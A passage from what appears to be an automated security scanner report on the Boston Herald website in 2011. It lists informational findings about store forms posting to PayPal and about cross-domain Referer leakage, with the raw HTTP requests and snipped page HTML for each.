Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/championsBuyNow.gif">
Champions: A Herald Media 64-page full color publication
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.16. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="http://bh.heraldinteractive.com/store/images/superSweet.jpg">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.17. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
</p>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_cart">
...[SNIP]...

6.18. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://multimedia.heraldinteractive.com/images/galleries/front_11052008.jpg" width="104" height="112">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.19. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.20. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan222009.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7. Cross-domain Referer leakage
There are 47 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www.bostonherald.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Request

GET /?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fhomepage.bg%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/da605ca3f0_HastyTEASE.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<a href="/sports/basketball/other_nba/view/20110128dwyane_wade_out_for_heat-pistons_game_with_sore_wrist/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/87d77e_DWade_01292011.jpg" alt="SITTING: Heat guard and Eastern Conference All Star starter Dwyane Wade will miss tonight&rsquo;s game against the Pistons with a sprained right wrist."></a>
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
